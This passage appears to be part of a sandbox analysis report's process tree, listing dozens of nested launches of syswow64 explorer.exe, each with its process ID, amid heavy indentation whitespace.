                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
